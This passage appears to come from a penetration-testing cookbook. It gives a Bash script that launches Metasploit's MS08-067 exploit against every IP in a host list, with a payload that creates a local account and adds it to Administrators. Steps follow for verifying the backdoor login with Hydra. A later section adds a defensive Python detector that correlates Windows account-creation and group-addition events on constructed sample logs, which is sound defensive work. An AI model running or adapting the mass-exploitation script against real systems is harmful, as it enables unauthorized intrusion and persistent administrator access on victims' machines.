How to do it...

The example that follows demonstrates how a Bash script can be used to exploit multiple instances of a single vulnerability simultaneously. This script in particular can be used to exploit multiple instances of the MS08-067 NetAPI vulnerability by referencing an input list of IP addresses:

#!/bin/bash
# Usage: ./script <host file> <username> <password>
# Opens one terminal per target IP; each terminal runs msfconsole with the
# MS08-067 module and a windows/exec payload that creates the given local
# account and adds it to the local Administrators group.

# All three arguments are required, so test for the last one.
if [ -z "$3" ]; then
  echo "Usage: ./script <host file> <username> <password>"
  exit 1
fi

iplist=$1
user=$2
pass=$3
i=0

# One IP address per line in the host file.
for ip in $(cat "$iplist")
do
  # gnome-terminal -x passes the rest of the line as the command to run
  # (newer releases use "--" instead of "-x"); msfconsole -x runs the
  # semicolon-separated console commands. Windows "net" needs "/add".
  gnome-terminal -x msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST $ip; set PAYLOAD windows/exec; set CMD cmd.exe /c net user $user $pass /add && net localgroup administrators $user /add; run"
  echo "Exploiting $ip and adding user $user"
  i=$((i+1))
done
echo "Launched $i exploitation terminals"
This script is different from the previous multithreaded exploitation scripts because of the payload. In this case, two sequential commands are executed upon successful exploitation. The first of these two commands creates a new user account named hutch and defines the associated password. The second command adds the newly created user account to the local administrators group.

  1. If the script is executed without supplying any arguments, the script will output the appropriate usage. This usage description will indicate that the script should be executed with three arguments: the filename of a text file containing a list of target IP addresses, followed by the username and password of the account to be created.
  2. Once executed with these arguments, a series of new terminals will begin popping up. Each of these terminals will run the exploitation sequence for one of the IP addresses in the input list.
  3. The original execution terminal will output a line for each process as it is launched and indicate that the new user account will be added on each target. After the exploitation sequence has completed in each terminal, the system can then be accessed through integrated terminal services such as RDP or via remote SMB authentication.
  4. To demonstrate that the account was added, Hydra is used to remotely log in to an exploited system using the newly added credentials.
  5. Hydra indicates that the login with the newly created credentials was successful. This newly created account can then be used for further nefarious purposes, or a script could be used to test for the presence of the account as a way of validating the exploitation of the vulnerability.
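The payload above leaves a distinctive trace on every target: a local account is created and, seconds later, added to the Administrators group, and the same account name appears on many hosts within minutes. The following is an added defender-side example, not code from the book, showing how to correlate those two signals. It assumes Windows Security events (4720, "a user account was created", and 4732, "a member was added to a security-enabled local group", both real event IDs) have been forwarded and flattened into JSON lines with the hypothetical field names used here; the sample events are constructed.

```python
"""Correlate 'account created' (4720) with 'added to Administrators' (4732).

Added example for detection; field names (host, target_user, member, group)
are an assumed flattening of the Windows Security log, not a standard schema.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: the same account created and elevated on three
# hosts within seconds, plus one benign administrator action for contrast.
SAMPLE_EVENTS = """
{"time": "2024-03-01T10:00:01Z", "host": "WS01", "event_id": 4720, "target_user": "hutch", "subject_user": "WS01$"}
{"time": "2024-03-01T10:00:02Z", "host": "WS01", "event_id": 4732, "member": "hutch", "group": "Administrators", "subject_user": "WS01$"}
{"time": "2024-03-01T10:00:03Z", "host": "WS02", "event_id": 4720, "target_user": "hutch", "subject_user": "WS02$"}
{"time": "2024-03-01T10:00:04Z", "host": "WS02", "event_id": 4732, "member": "hutch", "group": "Administrators", "subject_user": "WS02$"}
{"time": "2024-03-01T10:00:05Z", "host": "WS03", "event_id": 4720, "target_user": "hutch", "subject_user": "WS03$"}
{"time": "2024-03-01T10:00:06Z", "host": "WS03", "event_id": 4732, "member": "hutch", "group": "Administrators", "subject_user": "WS03$"}
{"time": "2024-03-01T14:30:00Z", "host": "WS07", "event_id": 4720, "target_user": "svc_backup", "subject_user": "admin.jane"}
{"time": "2024-03-01T14:45:00Z", "host": "WS07", "event_id": 4732, "member": "svc_backup", "group": "Remote Desktop Users", "subject_user": "admin.jane"}
"""


def parse_events(text):
    """Parse JSON lines into dicts with a datetime 'time', sorted by time."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def find_rapid_admin_creations(events, window_seconds=60):
    """Per host: account created (4720) and then added to the local
    Administrators group (4732) within window_seconds.

    Returns a list of (host, user, seconds_between) tuples.
    """
    created = {}  # (host, user) -> creation time
    findings = []
    for ev in events:
        if ev["event_id"] == 4720:
            created[(ev["host"], ev["target_user"].lower())] = ev["time"]
        elif ev["event_id"] == 4732 and ev.get("group", "").lower() == "administrators":
            key = (ev["host"], ev["member"].lower())
            if key in created:
                delta = (ev["time"] - created[key]).total_seconds()
                if 0 <= delta <= window_seconds:
                    findings.append((ev["host"], ev["member"], delta))
    return findings


def find_mass_account_creation(events, min_hosts=3, window_seconds=600):
    """Across hosts: the same account name created on at least min_hosts
    distinct hosts inside one sliding window of window_seconds.

    Returns {user: sorted list of hosts} for each flagged account name.
    """
    by_user = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4720:
            by_user[ev["target_user"].lower()].append((ev["time"], ev["host"]))
    window = timedelta(seconds=window_seconds)
    findings = {}
    for user, entries in by_user.items():
        entries.sort()
        for i, (t0, _) in enumerate(entries):
            hosts = {h for t, h in entries[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                findings[user] = sorted(hosts)
                break
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for host, user, secs in find_rapid_admin_creations(evs):
        print(f"[rapid-admin] {host}: '{user}' elevated {secs:.0f}s after creation")
    for user, hosts in find_mass_account_creation(evs).items():
        print(f"[mass-create] '{user}' created on {len(hosts)} hosts: {', '.join(hosts)}")
```

The two checks are deliberately independent: the per-host rule catches a single compromised machine, while the cross-host rule catches the batch pattern that a list-driven script produces even if the group addition failed or was logged differently. Both depend on account-management auditing being enabled on the endpoints and on the 4720/4732 events actually reaching the collector, which is the first thing to verify when a deployment of this detection yields nothing.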